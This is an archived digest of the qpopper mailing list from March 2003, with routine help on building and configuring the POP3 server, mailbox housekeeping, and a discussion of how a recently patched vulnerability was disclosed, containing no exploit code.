The qpopper list archive ending on 23 Mar 2003
Topics covered in this issue include:
1. Mailbox formats
Kenneth Porter <shiva at sewingwitch dot com>
Fri, 14 Mar 2003 03:46:11 -0800
2. Deficiencies in Courier
Kenneth Porter <shiva at sewingwitch dot com>
Fri, 14 Mar 2003 03:41:36 -0800
3. Can anybody help me?
Gustavo Moyano <gustavo at infodoors.com dot ar>
Fri, 14 Mar 2003 10:08:16 -0300
4. Re: Qpopper 4.0.5 (final) available
Mark <admin at asarian-host dot net>
Fri, 14 Mar 2003 13:48:41 GMT
5. Re: QPopper 4.0.5 engage problem.
The Little Prince <thelittleprince at asteroid-b612 dot org>
Fri, 14 Mar 2003 06:27:17 -0800 (PST)
6. Re: Qpopper 4.0.5 (final) available
Mike Tancsa <mike at sentex dot net>
Fri, 14 Mar 2003 12:29:44 -0500
7. Re: QPopper 4.0.5 engage problem.
The Little Prince <thelittleprince at asteroid-b612 dot org>
Fri, 14 Mar 2003 06:19:43 -0800 (PST)
8. Coding question
Steve Perrault <sperraul at mnsi dot net>
Fri, 14 Mar 2003 10:17:08 -0500
9. Re: QPopper 4.0.5 engage problem.
Carles Xavier Munyoz =?iso-8859-1?q?Baldó?= <carles at descom dot es>
Fri, 14 Mar 2003 15:22:25 +0100
10. Re: Qpopper 4.0.5 (final) available
Daniel Senie <dts at senie dot com>
Fri, 14 Mar 2003 12:39:46 -0500
11. Re: Qpopper 4.0.5 (final) available
Mark <admin at asarian-host dot net>
Fri, 14 Mar 2003 18:43:06 GMT
12. Re: QPopper 4.0.5 engage problem.
Randall Gellens <randy at qualcomm dot com>
Fri, 14 Mar 2003 11:35:37 -0800
13. Re: Coding question
"Ken Hohhof" <ken at mixedsignal dot com>
Fri, 14 Mar 2003 14:12:27 -0600
14. Re: Qpopper 4.0.5 (final) available
Mark <admin at asarian-host dot net>
Sat, 15 Mar 2003 01:36:47 GMT
15. Re: Qpopper 4.0.5 (final) available
Randall Gellens <randy at qualcomm dot com>
Fri, 14 Mar 2003 11:41:59 -0800
16. How to inform users of overqouta?
Christian Bauer <Christian.Bauer at NEFkom dot de>
Fri, 14 Mar 2003 15:24:52 +0100
17. .cache problem
"Narrowstream" <technique at narrowstream dot net>
Sat, 15 Mar 2003 09:44:53 +0100
18. Re: Qpopper 4.0.5 (final) available
Kenneth Porter <shiva at sewingwitch dot com>
Fri, 14 Mar 2003 23:55:41 -0800
19. Installation problem on FreeBSD
"Narrowstream" <technique at narrowstream dot net>
Sat, 15 Mar 2003 09:32:22 +0100
20. Re: .cache problem
Ken Hohhof <ken at mixedsignal dot com>
Sat, 15 Mar 2003 08:54:51 -0600
21. Re: Qpopper 4.0.5 (final) available
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sat, 15 Mar 2003 07:45:53 -0800 (PST)
22. Re: .cache problem
Chip Old <fold at bcpl dot net>
Sat, 15 Mar 2003 10:36:45 -0500 (EST)
23. Re: Qpopper 4.0.5 (final) available
Randall Gellens <randy at qualcomm dot com>
Sat, 15 Mar 2003 09:39:54 -0800
24. Re: Installation problem on FreeBSD
noetheriano <noetheriano at bsdpower dot org>
Sat, 15 Mar 2003 22:10:14 +0100
25. Re: Qpopper 4.0.5 (final) available
Kenneth Porter <shiva at sewingwitch dot com>
Sat, 15 Mar 2003 15:19:05 -0800
26. Fw: qpopper timing analysis on to determine if a username exists on a system
"Alan W. Rateliff, II" <lists at rateliff dot net>
Sat, 15 Mar 2003 21:18:23 -0500
27. Re: Fw: qpopper timing analysis on to determine if a username
Ken Hohhof <ken at mixedsignal dot com>
Sat, 15 Mar 2003 21:06:17 -0600
28. Qpopper 4.0.5 doesnt build poppassd with pam?
Joe Maimon <jmaimon at ttec dot com>
Sat, 15 Mar 2003 23:04:49 -0500
29. Re: BLUEHILL password thingy??????
Randall Gellens <randy at qualcomm dot com>
Sat, 15 Mar 2003 22:14:12 -0800
30. Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS
Randall Gellens <randy at qualcomm dot com>
Sat, 15 Mar 2003 22:20:19 -0800
31. Re: Qpopper/SSL problem
Randall Gellens <randy at qualcomm dot com>
Sat, 15 Mar 2003 22:59:17 -0800
32. Re: Correct permissions?
Randall Gellens <randy at qualcomm dot com>
Sat, 15 Mar 2003 22:56:38 -0800
33. Re: Qpopper 4.0.5 (final) available
Mark <admin at asarian-host dot net>
Sun, 16 Mar 2003 12:01:09 GMT
34. Re: Qpopper 4.0.5 (final) available
Mark <admin at asarian-host dot net>
Sun, 16 Mar 2003 13:49:36 GMT
35. Re: .cache problem
Alan Brown <alanb at digistar dot com>
Sun, 16 Mar 2003 08:58:11 -0500 (EST)
36. Re: .cache problem
Alan Brown <alanb at digistar dot com>
Sun, 16 Mar 2003 09:00:16 -0500 (EST)
37. Re: Qpopper 4.0.5 (final) available
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sun, 16 Mar 2003 06:48:53 -0800 (PST)
38. RE : Installation problem on FreeBSD
"Narrowstream" <technique at narrowstream dot net>
Mon, 17 Mar 2003 08:29:59 +0100
39. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O
Chris Shenton <Chris.Shenton at hq.nasa dot gov>
Mon, 17 Mar 2003 10:04:36 -0500
40. Re: Fwd: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
David Champion <dgc at uchicago dot edu>
Mon, 17 Mar 2003 11:42:10 -0600
41. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Greg Earle <earle at isolar.DynDNS dot ORG>
Mon, 17 Mar 2003 11:47:51 -0800
42. Re: Fw: qpopper timing analysis on to determine if a username
Martin Kellermann <Kellermann at sk-datentechnik dot com>
Tue, 18 Mar 2003 09:25:20 +0100
43. home-dir-misc not working in 4.0.5
Brad Blix <brad at cpinternet dot com>
Thu, 20 Mar 2003 09:48:17 -0600
44. Question about hashed directories...
Tim Meader <tmeader at cne-odin.gsfc.nasa dot gov>
Thu, 20 Mar 2003 14:19:38 -0500
45. Re: Fw: qpopper timing analysis on to determine if a username exists
Alan Brown <alanb at digistar dot com>
Sun, 16 Mar 2003 16:49:57 -0500 (EST)
46. RE : .cache problem
"Narrowstream" <technique at narrowstream dot net>
Tue, 18 Mar 2003 18:09:30 +0100
47. Re: home-dir-misc not working in 4.0.5
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sat, 22 Mar 2003 17:36:36 -0800 (PST)
48. test, ignore
Mark <admin at asarian-host dot net>
Fri, 21 Mar 2003 22:51:05 GMT
49. Re: .cache problem
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Tue, 18 Mar 2003 17:15:29 -0500
50. Re: Question about hashed directories...
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sat, 22 Mar 2003 18:13:57 -0800 (PST)
Date: Fri, 14 Mar 2003 03:46:11 -0800
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Mailbox formats
--On Thursday, March 13, 2003 5:33 PM -0500 Alan Brown <alanb at digistar dot com>
wrote:
> Cyrus (another Imap/pop solution) goes one step further and uses a
> (effectively proprietary) database format with its own MDA
Here's an interesting discussion of mailbox formats from the UW-IMAP
documentation:
<http://www.washington.edu/imap/documentation/formats.txt.html>
Date: Fri, 14 Mar 2003 03:41:36 -0800
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Deficiencies in Courier
--On Thursday, March 13, 2003 4:32 PM -0500 Chris Shenton
<Chris.Shenton at hq.nasa dot gov> wrote:
> I read that quote (from a couple years back) and he doesn't say how he
> believes Courier IMAP violates RFC -- he just asserts that it does.
> He doesn't approve of Maildir, so anything Maildir-related is bad in
> his view.
I looked up the thread and found it here:
<http://groups.google.com/groups?threadm=Pine.LNX.4.50.0206051124510.15249-
100000%40shiva0.cac.washington.edu&rnum=8&prev=/groups%3Fas_q%3Dcourier%26s
afe%3Dimages%26ie%3DUTF-8%26oe%3DUTF-8%26as_ugroup%3Dcomp.mail.imap%26lr%3D
%26num%3D100%26hl%3Den>
(Alas, Mulberry breaks URL's across lines unless one sets the fill column
to some high value.)
Here's Crispin's latest draft updating the IMAP RFC:
<http://www.ietf.org/internet-drafts/draft-crispin-imapv-20.txt>
From: Gustavo Moyano <gustavo at infodoors.com dot ar>
Subject: Can anybody help me?
Date: Fri, 14 Mar 2003 10:08:16 -0300
Hello.
I've installed qpopper 4.0.4 as POP3 server and all work very well from
withing my network, I can send and receive e-mail very well. But when my
users want to read e-mail from dial-up qpopper
show the message:
Mar 7 16:32:03 ns1 qpopper[232]: Insufficient room to generate path for
user
marcelo_luca; need more than 418; have only 256
Mar 7 16:32:03 ns1 qpopper[232]: marcelo_luca at
modem180-as13.capfed1.sinectis.com.ar (216.244.195.180): -ERR [SYS/TEMP]
Unable to get spool name
and the users can't logging.
My configuration was like this:
=2E/configure --enable-home-dir-mail=Mailbox
Can anybody help me?
Thanks.
From: Mark <admin at asarian-host dot net>
Date: Fri, 14 Mar 2003 13:48:41 GMT
Subject: Re: Qpopper 4.0.5 (final) available
Could someone please tell me what the difference is between these two files?
qpopper4.0.5-no-test.tar.gz
qpopper4.0.5.tar.gz
Does "no-test" mean it is not a test-version? Or does it mean it contains no
tests?
At any rate, I went with qpopper4.0.5.tar.gz. I compiled it on a FreeBSD
4.7R Vmware box first, and it does seem to be working quite lovely. :) So I
will likely start using it for real quite soon.
One thing I'd like to have off my chest, though.
I am not real happy with the way Qualcom has sprung the bad news on people,
along with supplying a workable exploit to use. That is like saying, "Hey,
here is a ready-made way to hack your server; and guess what? Your admin
does not know about it yet! Go for it!"
Though I am not running the Pentagon, I would have preferred to see this
announced here, or on the Qualcom website, with a description of the
problem, but not accompanied with a documented source of a hack. Maybe the
new terrorist laws require disclosure, or non-disclosure, at some stage -- I
am no expert on these things. But the professional, coordinated way sendmail
dealt with its recent security issue, that is what I would like to have
seen. They disclosed enough for every admin to understand the nature and
severity of the problem, without actually giving any clues as to how to go
about using the exploit.
This time the exploit was relatively harmless, as only authenticated users
could get a non-root shell. But next time it may be something a bit more
serious, and I might be out of town, for instance, and not have the
opportunity to be "on" it directly. So, for future references, can we please
not supply the source code for the exploit any more?
Thanks,
- Mark
Date: Fri, 14 Mar 2003 06:27:17 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: QPopper 4.0.5 engage problem.
On Fri, 14 Mar 2003, Carles Xavier Munyoz Baldó wrote:
> ****************************************************
> File is signed. signature not checked. signature, it is not known with high confidence that this public key
> ****************************************************
>
> I have found de solution, I have not compiled Qpopper with the
> --enable-stand-alone configuration option.
>
you mean --enable-standalone
nooooo - between stand and alone :-)
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
>
> On Friday 14 March 2003 15:19, The Little Prince wrote:
> > On Fri, 14 Mar 2003, Carles Xavier Munyoz Baldó wrote:
> > > Mar 14 12:20:37.333 2003
> > > Mar 14 12:20:37.373 2003 [6384] Unable to obtain socket and address of
> > > client: Socket operation on non-socket (95) [pop_init.c:1062]
> > > Mar 14 12:20:37.373 2003
> > > [...]
> > >
> > > I have compiled and executed it the the same way I did with the 4.0.4
> > > version. What may be the problem ?
> >
> > what does your ./configuration command line look like?
> >
> > --Tony
> > .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
> > Anthony J. Biacco Network Administrator/Engineer
> > thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
> >
> > "This will prove a brave kingdom to me,
> > where I shall have my music for nothing"
> > .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
>
>
Date: Fri, 14 Mar 2003 12:29:44 -0500
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: Qpopper 4.0.5 (final) available
At 01:48 PM 14/03/2003 +0000, Mark wrote:
>I am not real happy with the way Qualcom has sprung the bad news on people,
>along with supplying a workable exploit to use. That is like saying, "Hey,
>here is a ready-made way to hack your server; and guess what? Your admin
>does not know about it yet! Go for it!"
Qualcomm did not release the exploit, a person by the name of Florian Heinz
<heinz at cronon-ag dot de> did so on bugtraq. See (Message-ID:
<20030310143133.GB1086 at dereference dot de>)
In fact, the Qualcomm developer should be applauded for being so kind as to
provide a fix so quickly.
---Mike
Date: Fri, 14 Mar 2003 06:19:43 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: QPopper 4.0.5 engage problem.
On Fri, 14 Mar 2003, Carles Xavier Munyoz Baldó wrote:
> Mar 14 12:20:37.333 2003
> Mar 14 12:20:37.373 2003 [6384] Unable to obtain socket and address of client:
> Socket operation on non-socket (95) [pop_init.c:1062]
> Mar 14 12:20:37.373 2003
> [...]
>
> I have compiled and executed it the the same way I did with the 4.0.4 version.
> What may be the problem ?
>
what does your ./configuration command line look like?
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Date: Fri, 14 Mar 2003 10:17:08 -0500
From: Steve Perrault <sperraul at mnsi dot net>
Subject: Coding question
Our corporate customers use their full email address to fetch their mail
with another POP agent. To keep convention, we configure our normal ISP
customers to use "name@mnsi.net", or "name%mnsi dot net@popserver" for the rare
mail clients which balk at "user@domain@popserver".
In trim_domain(), in pop_user.c, I replace the line:
char *r = strchr ( q, '@' );
with,
char *r = strpbrk ( q, "@%" );
Is the library function, strpbrk() common enough to use in a future
releases instead of strchr()? Is it worth making this very minor change to
the source when I upgrade, or is it save to assume my clients are using
smarter email clients nowadays?
- SteveP
From: Carles Xavier Munyoz =?iso-8859-1?q?Baldó?= <carles at descom dot es>
Subject: Re: QPopper 4.0.5 engage problem.
Date: Fri, 14 Mar 2003 15:22:25 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I have found de solution, I have not compiled Qpopper with the
- --enable-stand-alone configuration option.
Sorry me :-)
On Friday 14 March 2003 15:19, The Little Prince wrote:
> On Fri, 14 Mar 2003, Carles Xavier Munyoz Baldó wrote:
> > Mar 14 12:20:37.333 2003
> > Mar 14 12:20:37.373 2003 [6384] Unable to obtain socket and address o
f
> > client: Socket operation on non-socket (95) [pop_init.c:1062]
> > Mar 14 12:20:37.373 2003
> > [...]
> >
> > I have compiled and executed it the the same way I did with the 4.0.4
> > version. What may be the problem ?
>
> what does your ./configuration command line look like?
>
> --Tony
> .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
_.-.
> Anthony J. Biacco Network Administrator/Engi
neer
> thelittleprince at asteroid-b612.org http://www dot asteroid-b612=
=2Eorg
>
> "This will prove a brave kingdom to me,
> where I shall have my music for nothing"
> .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
_.-.
- --
Saludos.
- ---
Carles Xavier Munyoz Baldó
carles at descom dot es
Descom Consulting
Telf: +34 965861024
Fax: +34 965861024
http://www.descom.es/
- ---
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQA/AwUBPnHloTvYAf7VZNaaEQIQfACgvYIS7/92EIKzgrkG4JfL5Y1Q9NEAoNzd
7GmhGq8D+YBCCYM6ujPGx87L
=4lsc
-----END PGP SIGNATURE-----
Date: Fri, 14 Mar 2003 12:39:46 -0500
From: Daniel Senie <dts at senie dot com>
Subject: Re: Qpopper 4.0.5 (final) available
At 08:48 AM 3/14/2003, Mark wrote:
>Could someone please tell me...
Could you maybe post from an email address that can accept replies? I tried
to answer you, but you use some system that bounces everyone's email unless
they "sign up" with some system of yours. No, I won't play that game just
to explain why your accusations are off base.
Get a real email address, please, and use it. While this system you're
using may save you time in terms of junk mail, it really just shifts the
time burden to folks you seem to want to have correspond with you. No thanks.
Dan
From: Mark <admin at asarian-host dot net>
Date: Fri, 14 Mar 2003 18:43:06 GMT
Subject: Re: Qpopper 4.0.5 (final) available
----- Original Message -----
From: "Shane Williams" <broot at ischool.utexas dot edu>
To: "Mark" <admin at asarian-host dot net>
Cc: "Qpopper Public List" <qpopper at lists.pensive dot org>
Sent: Friday, March 14, 2003 7:23 PM
Subject: Re: Qpopper 4.0.5 (final) available
> What I do know is that this vuln was not released by Qualcomm,
> but a member of the bugtraq mailing list. It was announced
> without prior warning to the Qpopper developers, so they weren't
> keeping you in the dark about anything they weren't themselves
> in the dark about.
Thanks for the clarification. It seems I was in error. I misread an
announcement as coming from Qualcomm, which, had I done some better reading,
came from a single individual. Sorry about that.
> All things considered I'm super-impressed with the speed with which
> Randall responded to the issue and provided patches for the problem
> (as well as another non-exploitable bug in the code).
Yes, I'd say a one day response time for a new version is a pretty good
track record. :) I took the 4.0.5 update to the production environment now,
and everything is running smoothly again like before -- minus the bug. :)
- Mark
Date: Fri, 14 Mar 2003 11:35:37 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: QPopper 4.0.5 engage problem.
At 12:24 PM +0100 3/14/03, Carles Xavier Munyoz Baldó wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
> I have successfully compiled the new QPopper 4.0.5 version in my UNIX_SV
SCO
> computer, like I did before with the 4.0.4 version.
>
> The problem I have is that when I try to run it as a stand alone daemon I
get
> the error:
> ./popper -t trace.txt -F -R -S -s
> [...]
> ar 14 12:20:37.323 2003 [6384] Trace and Debug destination is file
> "trace.txt"
> [pop_init.c:888]
> Mar 14 12:20:37.323 2003
> Mar 14 12:20:37.323 2003 [6384] set fast-update [pop_init.c:762]
> Mar 14 12:20:37.323 2003
> Mar 14 12:20:37.323 2003 [6384] Avoiding reverse lookups (-R)
> [pop_init.c:853]
> Mar 14 12:20:37.323 2003
> Mar 14 12:20:37.323 2003 [6384] server mode is the default (-S)
> [pop_init.c:863]
> Mar 14 12:20:37.323 2003
> Mar 14 12:20:37.333 2003 [6384] Will generate stats records (-s)
> [pop_init.c:858]
> Mar 14 12:20:37.333 2003
> Mar 14 12:20:37.373 2003 [6384] Unable to obtain socket and address
> of client:
> Socket operation on non-socket (95) [pop_init.c:1062]
> Mar 14 12:20:37.373 2003
> [...]
>
> I have compiled and executed it the the same way I did with the
> 4.0.4 version.
> What may be the problem ?
>
> Greetings.
> - ---
> Carles Xavier Munyoz Baldó
> carles at descom dot es
> Descom Consulting
> Telf: +34 965861024
> Fax: +34 965861024
> http://www.descom.es/
> - ---
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.5.8
>
> iQA/AwUBPnG8AjvYAf7VZNaaEQLnfACfXnuye0qaP14ztLGYNDLVYq/KoeEAnjxS
> go8LbGLPzHf7JZ4+ubNOP2Lp
> =Mqy4
> -----END PGP SIGNATURE-----
What does a 'popper/popper -v' show?
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
The optimist proclaims that we live in the best of all possible worlds,
and the pessimist fears this is true. --James Branch Cabell
From: "Ken Hohhof" <ken at mixedsignal dot com>
Subject: Re: Coding question
Date: Fri, 14 Mar 2003 14:12:27 -0600
> ... or is it save to assume my clients are using smarter email clients
nowadays?
I believe all Netscape Communicator clients require the % trick. I'm not
sure about Netscape 7.
Lots of Mac owners still use Netscape Messenger as their email client. Also
some Windows users.
From: Mark <admin at asarian-host dot net>
Date: Sat, 15 Mar 2003 01:36:47 GMT
Subject: Re: Qpopper 4.0.5 (final) available
----- Original Message -----
From: "Daniel Senie" <dts at senie dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Saturday, March 15, 2003 1:31 AM
Subject: Re: Qpopper 4.0.5 (final) available
> At 08:48 AM 3/14/2003, Mark wrote:
> >Could someone please tell me...
>
> Could you maybe post from an email address that can accept replies?
> I tried to answer you, but you use some system that bounces everyone's
> email unless they "sign up" with some system of yours. No, I won't play
> that game just to explain why your accusations are off base.
What the hell are you talking about?? Nobody's mail gets bounced, or has to
jump through some sign-up hoops. You are obviously seriously mistaken. Maybe
your domain is in the access.db, as known spammer. I would have looked it
up, but I care too less for your tone to bother.
Bye,
- Mark
Date: Fri, 14 Mar 2003 11:41:59 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: Qpopper 4.0.5 (final) available
At 1:48 PM +0000 3/14/03, Mark wrote:
> Could someone please tell me what the difference is between these two files?
>
> qpopper4.0.5-no-test.tar.gz
> qpopper4.0.5.tar.gz
>
> Does "no-test" mean it is not a test-version? Or does it mean it contains no
> tests?
The 'no-test' tarball omits the extensive test files. Since the test
files are of little interest to anyone except developers (and only
test certain aspects), the 'no-test' tarball provides a smaller, and
hence more convenient, distribution.
> I am not real happy with the way Qualcom has sprung the bad news on people,
> along with supplying a workable exploit to use. That is like saying, "Hey,
> here is a ready-made way to hack your server; and guess what? Your admin
> does not know about it yet! Go for it!"
This is not the case. Qualcomm learned of the exploit at the same
time and the same way as everyone else: the exploit was announced in
a public mailing list. Qualcomm was not informed in advance. As
soon as I became aware of the exploit, I worked as fast as I could to
verify it and produce a high-quality fix.
What lead you to think that Qualcomm had announced the exploit?
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
Only in a police state is the job of a policeman easy.
--Orson Welles
Date: Fri, 14 Mar 2003 15:24:52 +0100
From: Christian Bauer <Christian.Bauer at NEFkom dot de>
Subject: How to inform users of overqouta?
HI There,
I'm searching for a cool possibility to inform my users about runnting
out of qouta-diskspace.
I'm running qpopper 4.0.5/sendmail/procmail/XFS+qoutas.
one possibility is to run a script that checks the quota.. and send an
email to the user
when his mailbox is e.g. 90% full.
but the runtime of this script depends on the number of users.
it would be great if Qpopper could do this on the fly .. like bulletins..
one message for all users - stored like a bulletin message.
a flag in the bulletin-db for overqouta-warning.. qpopper
should send this message only once in over-qouta condition.
flag unset if user is below his qouta-treshhold.
or are there any cool features like this available as a patch ??
or how do other people handle overqouta in mailboxes ?!?!?!
another problem: if hardlimit of mailbox is reached, qpopper
is not able to generate the lock-file for the user's mailbox and
user is not possilbe to login.
any solutions for this problem?
many thanks for help.. (and excuse my bad english)
Chris
--
NEFkom Telekommunikation GmbH & Co.
Spittlertorgraben 13 Tel. 0911/1808-18
D-90429 Nuernberg Fax. 0911/1808-409
http://www.NEFkom.de mailto:Christian.Bauer at NEFkom dot de
From: "Narrowstream" <technique at narrowstream dot net>
Subject: .cache problem
Date: Sat, 15 Mar 2003 09:44:53 +0100
Hello again,
I have another problem.
I want to know when the users check their mailbox because, if they don't
check, it means they don't need and then, I can remove the mailbox :) I
use
a script to check the date of the .user.cache file.
I use :
* FreeBSD 4.7
* Sendmail 8.12.8
* Qpopper 4.0.5 (but same problem en 4.0.4)
* I don't use IMAP
* My configuration line :
./configure --disable-check-pw-max --enable-shy --disable-specialauth
--prefix=/usr/local/qpopper-4.0.5 --enable-spool-dir=/var/mail
--enable-temp-drop-dir=/var/mail/tmp --enable-standalone
--enable-server-mode --enable-keep-temp-drop
* My execution line :
popper -s -S -F
My problem is :
If the mailbox is empty and the user checks it, there is a .cache file
that
is created in /var/mail/tmp.
When a user has at least one mail in his mailbox and then download the
mail,
there is no .cache file in the directory /var/mail/tmp.
Is it a bug ?
Is there another possibility to know when do they check the mailbox ?
Thanks in advance
Stephane
Date: Fri, 14 Mar 2003 23:55:41 -0800
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: Qpopper 4.0.5 (final) available
--On Friday, March 14, 2003 6:43 PM +0000 Mark <admin at asarian-host dot net>
wrote:
> Yes, I'd say a one day response time for a new version is a pretty good
> track record. :)
There was some recent exploit where the developer had a fix 90 minutes from
the announcement of the exploit. I think all the OS guys are trying to beat
that record! ;)
(Alas, the Homeland "Security" crap is now making it harder to report
exploits, by potentially punishing the reporter for not jumping through the
law's exact hoops. It's not unlike the way recycling fees make recycling
oil more expensive (thereby encouraging people to dump it instead).)
From: "Narrowstream" <technique at narrowstream dot net>
Subject: Installation problem on FreeBSD
Date: Sat, 15 Mar 2003 09:32:22 +0100
Hello all,
The problem is the same with qpopper 4.0.4 and the last 4.0.5
I work on FreeBSD 4.7. with sendmail 8.12.8
Here is the installation problem :
I do a configure :
./configure --disable-check-pw-max --enable-shy --disable-specialauth
--prefix=/usr/local/qpopper-4.0.5 --enable-spool-dir=/var/mail
--enable-temp-drop-dir=/var/mail/tmp --enable-standalone
--enable-server-mode --enable-keep-temp-drop
--> It works
I do make :
--> It works
I do make install :
--> and the problems appear :
make install
/usr/bin/install -c -m 0644 -o root ./man/popper.8
/usr/local/qpopper-4.0.5/man/man8/
install: /usr/local/qpopper-4.0.5/man/man8/: No such file or directory
*** Error code 71
--> I'm obliged to do a : mkdir -p /usr/local/qpopper-4.0.5/man/man8/
And then, i do make install again :
/usr/bin/install -c -m 0644 -o root ./man/popper.8
/usr/local/qpopper-4.0.5/man/man8/
echo "Installed man/popper.8 as
/usr/local/qpopper-4.0.5/man/man8/popper.8"
Installed man/popper.8 as /usr/local/qpopper-4.0.5/man/man8/popper.8
/usr/bin/install -c -m 0644 -o root ./man/popauth.8
/usr/local/qpopper-4.0.5/man/man8/
echo "Installed man/popauth.8 as
/usr/local/qpopper-4.0.5/man/man8/popauth.8"
Installed man/popauth.8 as /usr/local/qpopper-4.0.5/man/man8/popauth.8
cd ./popper && make install
cd ../mmangle && make all
cd ../common && make all
gcc pop_dele.o pop_dropcopy.o pop_get_command.o pop_get_subcommand.o
pop_init.o pop_last.o pop_list.o pop_log.o pop_lower.o pop_msg.o
pop_parse.o pop_pass.o pop_quit.o pop_rset.o pop_send.o pop_stat.o
pop_updt.o pop_user.o pop_xtnd.o pop_xmit.o popper.o pop_bull.o
xtnd_xlst.o pop_uidl.o mktemp.o pop_rpop.o pop_apop.o md5.o pop_auth.o
pop_pope.o pop_extend.o scram.o hmac.o base64.o pop_util.o
get_sub_opt.o
msg_ptr.o drac.o pop_config.o pop_tls.o pop_tls_openssl.o
pop_tls_sslplus.o
sslplus_utils.o main.o pop_cache.o genpath.o -o popper
../mmangle/libmangle.a -I../common ../common/libcommon.a -lcrypt
../common/libcommon.a(maillock.o): In function `Qmaillock':
/public/programs/qpopper4.0.5/common/maillock.c:592: warning: tempnam()
possibly used unsafely; consider using mkstemp()
/usr/bin/install -c -s -m 0755 -o root popper
/usr/local/qpopper-4.0.5/sbin/popper
install: /usr/local/qpopper-4.0.5/sbin/popper: No such file or directory
*** Error code 71
Stop in /public/programs/qpopper4.0.5/popper.
*** Error code 1
--> I'm obliged to do a : mkdir /usr/local/qpopper-4.0.5/sbin/
And then i do a make install again and it works.
I do know this problem is not important, but if it could be solved, it
will
be nice.
Thanks for all your works.
Stephane
Date: Sat, 15 Mar 2003 08:54:51 -0600
From: Ken Hohhof <ken at mixedsignal dot com>
Subject: Re: .cache problem
>I want to know when the users check their mailbox because, if they don't
>check, it means they don't need and then, I can remove the mailbox :) I use
>a script to check the date of the .user.cache file.
I use different methods to check if mailboxes are in use.
First, I regularly do something like:
cd /var/spool/mail
ls -lS | head
ls -lrt | head
The first ls finds mailbox hogs, the second finds abandoned mailboxes. I
guess you may feel this doesn't accomplish your goal because the date on
the mailspool file will be recent as long as it is receiving mail even if
it is not being checked.
I also run a script that includes a line like:
grep "Stats: $1 " /var/log/maillog | tail --lines 1
which looks for the last mail check by a user, it can be very useful to
know if they are checking, if they had mail, if they are leaving it on the
server, etc.
Since we let the cache files get deleted after users check their mail, we
prefer to use the logfile to determine if a mailbox is active. This seems
like a more robust approach and also yields some information that is very
useful in troubleshooting mail problems for users.
One more thing, beware of deleting mail accounts just because they appear
inactive, until you first check to make sure they aren't being forwarded.
Date: Sat, 15 Mar 2003 07:45:53 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Qpopper 4.0.5 (final) available
On Sat, 15 Mar 2003, Mark wrote:
> What the hell are you talking about?? Nobody's mail gets bounced, or has to
> jump through some sign-up hoops. You are obviously seriously mistaken. Maybe
> your domain is in the access.db, as known spammer. I would have looked it
> up, but I care too less for your tone to bother.
>
yeah, it does. i've seen exactly what he's talking about, replying to one
specific person.
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Date: Sat, 15 Mar 2003 10:36:45 -0500 (EST)
From: Chip Old <fold at bcpl dot net>
Subject: Re: .cache problem
On Sat, 15 Mar 2003 09:44 +0100, Narrowstream wrote to Subscribers of
Qpopper:
> I want to know when the users check their mailbox because, if they don't
> check, it means they don't need and then, I can remove the mailbox :) I use
> a script to check the date of the .user.cache file.
You don't need the .user.pop file for that. On most systems you can
determine when a customer last read mail by the ATIME (last access time)
of the mailbox (/var/mail/username or whatever). If you don't have many
mailboxes, use `ls -laut /var/mail' to generate a list sorted by last
access time. To determine how long it has been since a specific user
accessed his/her mail, use `ls -lau /var/mail/username'.
If you have a lot of mailboxes the `ls' output will be too unweildy.
